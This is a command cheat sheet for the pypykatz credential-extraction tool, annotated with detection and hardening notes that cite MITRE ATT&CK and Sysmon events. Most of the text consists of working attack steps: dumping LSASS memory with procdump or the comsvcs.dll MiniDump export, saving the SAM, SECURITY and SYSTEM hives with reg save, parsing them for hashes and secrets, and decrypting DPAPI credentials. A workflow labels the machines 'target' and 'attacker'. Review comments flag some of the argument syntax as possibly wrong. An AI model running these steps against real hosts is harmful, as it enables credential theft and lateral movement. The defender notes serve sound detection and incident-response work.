# Install pypykatz with pip (from PyPI unless another index is configured).
# This tool parses credential material, so on an analysis workstation install
# it into a dedicated virtual environment and pin the release, ideally through
# a hash-checked requirements file.
pip3 install pypykatz
| Command | Description |
| --- | --- |
| `pypykatz lsa minidump lsass.dmp` | Parse LSASS dump |
| `pypykatz lsa minidump lsass.dmp -o json` | JSON output |
| `pypykatz lsa minidump /path/ -r` | Recursive directory |
| `pypykatz live lsa` | Live LSASS (Windows, admin) |
# Offline parsing of registry hive files that were saved from a Windows host.
# SYSTEM is supplied in every variant below; it holds the boot key that the
# other hives are decrypted with.
# NOTE(review): confirm the argument syntax with `pypykatz registry -h`;
# upstream help lists the SYSTEM hive as a positional argument rather than a
# `--system` option.
# The hive copies and the parser output are credential material: keep them on
# encrypted storage and remove them when the analysis is finished.
# Full extraction (SAM and SECURITY hives together)
pypykatz registry --sam SAM --security SECURITY --system SYSTEM
# SAM only (local account database)
pypykatz registry --sam SAM --system SYSTEM
# LSA secrets only (SECURITY hive)
pypykatz registry --security SECURITY --system SYSTEM
# Offline decryption of DPAPI-protected files with a masterkey that has
# already been recovered.
# Single credential file
pypykatz dpapi credential <cred_file> <masterkey>
# A directory of credential files; --mkf takes a masterkey file
# (presumably a file holding the recovered masterkeys; confirm with
# `pypykatz dpapi -h`)
pypykatz dpapi credentials <creds_dir> --mkf <masterkey_file>
# Vault credential (VCRD) file
pypykatz dpapi vcrd <vcrd_file> <masterkey>
# Recover a DPAPI masterkey from a masterkey file.
# With password
pypykatz dpapi masterkey <masterkey_file> -p <password>
# With domain backup key
# Defender note: the domain DPAPI backup key (.pvk) can open the masterkeys of
# every domain user, and Microsoft documents no supported way to rotate it, so
# its exposure should be handled as a domain-wide incident.
pypykatz dpapi masterkey <masterkey_file> --pvk <backup.pvk>
# Generate prekey
# Takes the user's SID and password as input (presumably to produce key
# material for the masterkey step; confirm with `pypykatz dpapi -h`).
pypykatz dpapi prekey password <SID> <password>
# Two ways shown on this page of writing LSASS process memory to lsass.dmp
# (MITRE ATT&CK T1003.001, OS Credential Dumping: LSASS Memory).
# Detection: process-access telemetry with lsass.exe as the target (Sysmon
# Event ID 10), a .dmp file created by an unexpected process (Sysmon Event
# ID 11), and process-creation command lines that pair procdump with lsass or
# comsvcs.dll with MiniDump (Sysmon Event ID 1, or Security 4688 with
# command-line auditing enabled).
# Hardening: LSA protection (RunAsPPL), Credential Guard, and the Defender ASR
# rule "Block credential stealing from the Windows local security authority
# subsystem".
# procdump: -ma writes a dump containing all process memory.
procdump.exe -ma lsass.exe lsass.dmp
# rundll32: calls the MiniDump export of comsvcs.dll against the given PID.
rundll32 comsvcs.dll MiniDump <PID> lsass.dmp full
# Save the SAM, SECURITY and SYSTEM hives to files named SAM, SECURITY and
# SYSTEM (relative paths, so they land in the current directory). Reading the
# SAM and SECURITY keys requires an elevated context.
# MITRE ATT&CK T1003.002 (Security Account Manager) and T1003.004 (LSA Secrets).
# Detection: process-creation logging with command lines (Sysmon Event ID 1 /
# Security 4688) for `reg save` against HKLM\SAM, HKLM\SECURITY or HKLM\SYSTEM;
# outside of planned backup or forensic work this combination is rare.
reg save HKLM\SAM SAM
reg save HKLM\SECURITY SECURITY
reg save HKLM\SYSTEM SYSTEM
Type Path
User Credentials %AppData%\Microsoft\Credentials\
User Vault %AppData%\Microsoft\Vault\
User Masterkeys %AppData%\Microsoft\Protect\<SID>\
System Credentials %SystemRoot%\System32\config\systemprofile\...
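| Option | Format |
| --- | --- |
| `-o text` | Human-readable (default) |
| `-o json` | JSON |
| `-o grep` | Grep-friendly |

Note: verify these options against `pypykatz lsa -h` on the installed release; upstream help text documents `-o` as an output-file path, with `--json` and `-g` selecting JSON and grep-friendly output.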
# Workflow: create the dump on the Windows host, parse it on another machine.
# 1. Dump on target
procdump.exe -ma lsass.exe lsass.dmp
# 2. Analyze on attacker (any OS)
# Defender note: parsing happens off-host, so no credential-parsing tool ever
# runs on the endpoint. Host-side detection has to key on step 1 (access to
# lsass.exe, creation of the .dmp file) and on the dump file leaving the host.
pypykatz lsa minidump lsass.dmp
# Workflow: take DPAPI masterkeys out of a parsed LSASS dump and use one to
# decrypt a credential file.
# Defender note: because masterkeys are recoverable from an LSASS dump, the
# scope of an LSASS-dump incident includes the DPAPI-protected secrets (saved
# credentials, vault entries) of the users whose keys were in memory.
# 1. Get masterkeys from LSASS
# Filters the parser output down to lines mentioning dpapi (case-insensitive).
pypykatz lsa minidump lsass.dmp | grep -i dpapi
# 2. Decrypt credential file
# The masterkey argument is written here as <guid>:<key_hex>.
pypykatz dpapi credential <cred_file> <guid>:<key_hex>
Tool Use Case
Mimikatz Live Windows attacks
LaZagne Application credentials
Impacket Remote attacks